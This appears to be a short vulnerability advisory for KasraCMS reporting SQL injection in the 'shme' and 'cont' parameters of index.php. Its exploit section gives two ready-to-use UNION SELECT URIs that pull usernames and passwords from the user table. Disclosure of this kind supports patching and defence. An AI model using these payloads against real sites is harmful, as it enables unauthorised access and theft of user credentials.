KasraCMS 'index.php' Multiple SQL Injection Vulnerabilities

info
discussion
exploit
solution
references

KasraCMS 'index.php' Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URI examples are available:

http://localhost/[path]/index.php?shme=-63 UNION ALL SELECT
0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user--

http://localhost/[path]/index.php?cont=-63 UNION ALL SELECT
0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user--